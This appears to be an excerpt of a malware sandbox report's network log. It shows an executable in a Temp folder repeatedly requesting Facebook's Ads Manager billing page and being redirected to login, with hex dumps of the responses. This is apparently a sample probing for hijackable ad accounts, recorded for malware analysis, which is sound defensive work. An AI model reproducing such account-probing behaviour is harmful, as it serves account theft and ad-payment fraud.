                                                                                    2023-02-07 18:46:25 UTC1411INData Raw: 55 43 57 6e 4c 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 34 35 38 31 31 33 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 5f 76 61 4d 33 37 4e 41 64 70 6f 54 70 6c 47 2d 35 32 42 53 55 66 73 73 6f 6c 41 33 79 47 37 49 74 35 72 6a 37 7a 6e 7a 59 48 59 48 6d 38 76 76 77 66 35 69 32 6c 70 66 4f 76 71 54 58 6a 34 61 74 49 63 43 46 78 43 6b 71 65 65 78 50 4a 54 44 47 77 36 39 73 41 6f 4f 35 70 68 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 36 39 39 33 30 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 31 6f 56 51 4f 30 79 57 79 76 66 61 6f 46 73 39 77 53 4f 65 61 51 6c 55 50 79 45 62 48 50 38 66 61 77 44 6e 64 64 4d 71 58 4b 45 67 4b 70 4d 5f 39 6b 6f 43 35 50 6b 35 2d 50 38 71 68 69 65 5f 75 66 35 4b 43 4a 6a 79 4e 73 50 68
                                                                                    Data Ascii: UCWnLk"]},-1],["cr:1458113",[],{__rc:[null,"Aa2_vaM37NAdpoTplG-52BSUfssolA3yG7It5rj7znzYHYHm8vvwf5i2lpfOvqTXj4atIcCFxCkqeexPJTDGw69sAoO5phk"]},-1],["cr:1069930",[],{__rc:[null,"Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPh
                                                                                    2023-02-07 18:46:25 UTC1413INData Raw: 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 41 61 31 6f 56 51 4f 30 79 57 79 76 66 61 6f 46 73 39 77 53 4f 65 61 51 6c 55 50 79 45 62 48 50 38 66 61 77 44 6e 64 64 4d 71 58 4b 45 67 4b 70 4d 5f 39 6b 6f 43 35 50 6b 35 2d 50 38 71 68 69 65 5f 75 66 35 4b 43 4a 6a 79 4e 73 50 68 63 45 58 46 4e 56 4e 55 43 57 6e 4c 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 30 35 31 35 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 2d 48 59 68 59 37 7a 46 7a 6e 46 37 36 6f 53 57 6b 37 46 41 58 53 5a 72 75 41 5f 67 6d 6e 30 42 43 58 44 70 57 48 67 54 5a 4e 6d 78 5f 78 72 5f 7a 38 6a 63 67 59 51 32 2d 43 76 41 50 51 53 2d 49 72 37 45 72 56 4d 4b 70 59 61 4f 56 53 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67
                                                                                    Data Ascii: yerHideOnTransition","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["cr:1105154",[],{__rc:[null,"Aa3-HYhY7zFznF76oSWk7FAXSZruA_gmn0BCXDpWHgTZNmx_xr_z8jcgYQ2-CvAPQS-Ir7ErVMKpYaOVSw"]},-1],["BanzaiConfig
                                                                                    2023-02-07 18:46:25 UTC1414INData Raw: 42 6b 78 6a 6c 2d 59 78 55 57 39 6a 56 22 5d 7d 2c 2d 31 5d 2c 5b 22 43 6f 72 65 57 61 72 6e 69 6e 67 47 4b 22 2c 5b 5d 2c 7b 66 6f 72 63 65 57 61 72 6e 69 6e 67 3a 66 61 6c 73 65 7d 2c 37 32 35 5d 2c 5b 22 63 72 3a 35 32 37 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 2d 6f 72 2d 70 72 6f 66 69 6c 69 6e 67 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 2d 6f 72 2d 70 72 6f 66 69 6c 69 6e 67 22 2c 22 41 61 33 2d 48 59 68 59 37 7a 46 7a 6e 46 37 36 6f 53 57 6b 37 46 41 58 53 5a 72 75 41 5f 67 6d 6e 30 42 43 58 44 70 57 48 67 54 5a 4e 6d 78 5f 78 72 5f 7a 38 6a 63 67 59 51 32 2d 43 76 41 50 51 53 2d 49 72 37 45 72 56 4d 4b 70 59 61 4f 56 53 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63
                                                                                    Data Ascii: Bkxjl-YxUW9jV"]},-1],["CoreWarningGK",[],{forceWarning:false},725],["cr:5277",["ReactDOM.classic.prod-or-profiling"],{__rc:["ReactDOM.classic.prod-or-profiling","Aa3-HYhY7zFznF76oSWk7FAXSZruA_gmn0BCXDpWHgTZNmx_xr_z8jcgYQ2-CvAPQS-Ir7ErVMKpYaOVSw"]},-1],["c
                                                                                    2023-02-07 18:46:25 UTC1415INData Raw: 39 32 34 0d 0a 73 46 75 6c 6c 55 70 64 61 74 65 3a 74 72 75 65 2c 6e 65 65 64 73 50 61 72 74 69 61 6c 55 70 64 61 74 65 3a 66 61 6c 73 65 2c 73 68 6f 75 6c 64 4c 6f 67 52 65 73 6f 75 72 63 65 50 65 72 66 3a 66 61 6c 73 65 7d 2c 33 39 37 37 5d 2c 5b 22 57 65 62 53 74 6f 72 61 67 65 4d 6f 6e 73 74 65 72 4c 6f 67 67 69 6e 67 55 52 49 22 2c 5b 5d 2c 7b 75 72 69 3a 22 2f 61 6a 61 78 2f 77 65 62 73 74 6f 72 61 67 65 2f 70 72 6f 63 65 73 73 5f 6b 65 79 73 2f 3f 73 74 61 74 65 3d 31 22 7d 2c 33 30 33 32 5d 2c 5b 22 42 72 6f 77 73 65 72 50 61 79 6d 65 6e 74 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 65 6e 61 62 6c 65 64 3a 66 61 6c 73 65 7d 2c 33 39 30 34 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 65 6c 61 79 3a 31
                                                                                    Data Ascii: 924sFullUpdate:true,needsPartialUpdate:false,shouldLogResourcePerf:false},3977],["WebStorageMonsterLoggingURI",[],{uri:"/ajax/webstorage/process_keys/?state=1"},3032],["BrowserPaymentHandlerConfig",[],{enabled:false},3904],["TimeSpentConfig",[],{delay:1
                                                                                    2023-02-07 18:46:25 UTC1417INData Raw: 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 67 5a 7a 69 59 79 70 34 4c 43 5f 48 59 66 34 75 69 77 55 49 65 32 69 62 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 41 72 74 69 6c 6c 65 72 79 22 2c 22 64 69 73 61 62 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 4c 6f 67 67 65 72 22 2c 22 73 74 61 72 74 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 5d 7d 2c 68 73 72 70 3a 7b 68 73 64 70 3a 7b 63 6c 70 44 61 74 61 3a 7b 22 31 38 37 31 36 39 37 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 32 39 33 31 39 22 3a 7b 72 3a 31 7d 2c 22 31
                                                                                    Data Ascii: ueue",[],["_js_sb","gZziYyp4LC_HYf4uiwUIe2ib",63072000000,"/",false,false,true]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{r:1},"1


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    19192.168.2.349767157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:27 UTC1417OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:27 UTC1418INHTTP/1.1 302 Found
                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-resource-policy: same-origin
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: yYprDG5u9etf3PyELjPtekinkvLQZ02v/KvdQiNo0JtpH+mujfuYPUPHIdZ7a0gJfKC1qkZ8eKrev0tHvS7QbQ==
                                                                                    Date: Tue, 07 Feb 2023 18:46:27 GMT
                                                                                    2023-02-07 18:46:27 UTC1420INData Raw: 50 72 69 6f 72 69 74 79 3a 20 75 3d 33 2c 69 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a
                                                                                    Data Ascii: Priority: u=3,iAlt-Svc: h3=":443"; ma=86400Connection: closeContent-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.2.349709157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:45:35 UTC195OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:45:36 UTC196INHTTP/1.1 302 Found
                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-resource-policy: same-origin
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: P3FTkaXLg78jxs8jPU4GikxjmdpE9gnTmgdqPLBk1opFPyTTZLQT8lYJMTVb0epgaslHnQYIS1H29lIdavtXmw==
                                                                                    2023-02-07 18:45:36 UTC198INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 35 3a 33 36 20 47 4d 54 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:45:36 GMTAlt-Svc: h3=":443"; ma=86400Connection: closeContent-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    20192.168.2.349769157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:27 UTC1420OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:27 UTC1421INHTTP/1.1 200 OK
                                                                                    Vary: Accept-Encoding
                                                                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: aHco0iC4HzEU8mEFSlObOZQZg0qTnsR1zfQuM+R1vWODyodvanW+Wp7dN8q15vnKMvEo/ypFgVRVo971IV7SEQ==
                                                                                    2023-02-07 18:46:27 UTC1423INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 32 37 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:27 GMTTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400Connection: close
                                                                                    2023-02-07 18:46:27 UTC1423INData Raw: 64 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 55 6a 45 63 4b 36 64 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b
                                                                                    Data Ascii: dac<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="0UjEcK6d">function envFlush(a){function b(b){for(var c in a)b[c]=a[
                                                                                    2023-02-07 18:46:27 UTC1425INData Raw: 6c 6f 67 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4c 6f 67 20 69 6e 20 6f 72 20 73 69 67 6e 20 75 70 20 74 6f 20 76 69 65 77 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 70 6f 73 74 73 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 6d 6f 72 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 76 2f 72 2f 42 38 42 78 73 73 63 66 56 42 72 2e 69 63 6f 22 20 2f 3e 3c 6c 69 6e
                                                                                    Data Ascii: login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><lin
                                                                                    2023-02-07 18:46:27 UTC1426INData Raw: 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 76 36 59 65 42 69 45 22 20 6e 6f 6e 63 65 3d 22 30 55 6a 45 63 4b 36 64 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 55 6a 45 63 4b 36 64 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 38 31 34 38 35 32 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 33 38 31 34 32 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 2c 22 31 39 34 39 38 39 38 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 34 38 38 31 35 22 3a 7b 22 72 22 3a 31 30 30 30 30 2c 22 73 22 3a 31 7d 2c 22 31 37 34 34 31
                                                                                    Data Ascii: j3Wp8lg5Kz" data-bootloader-hash="v6YeBiE" nonce="0UjEcK6d"></script><script nonce="0UjEcK6d">requireLazy(["HasteSupportData"],function(m){m.handle({"clpData":{"1814852":{"r":1},"1838142":{"r":1,"s":1},"1949898":{"r":1},"1848815":{"r":10000,"s":1},"17441
                                                                                    2023-02-07 18:46:27 UTC1427INData Raw: 63 36 38 36 0d 0a 33 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 62 77 69 7a 57 67 44 61 46 51 75 64 6d 44 74 6f 22 7d 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 66 44 55 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 49 47 30 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 76 56 6b 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54
                                                                                    Data Ascii: c686340":{"result":false,"hash":"AT5bwizWgDaFQudmDto"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFfDU"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtIG0"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwqvVk"},"3752":{"result":false,"hash":"AT
                                                                                    2023-02-07 18:46:27 UTC1428INData Raw: 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 63 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 63 70 70 6f 22 3a 7b 22 74 22 3a 38 36 34 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65
                                                                                    Data Ascii: reConfig",[],{"c_user":{"s":"None"},"cppo":{"t":86400,"s":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None
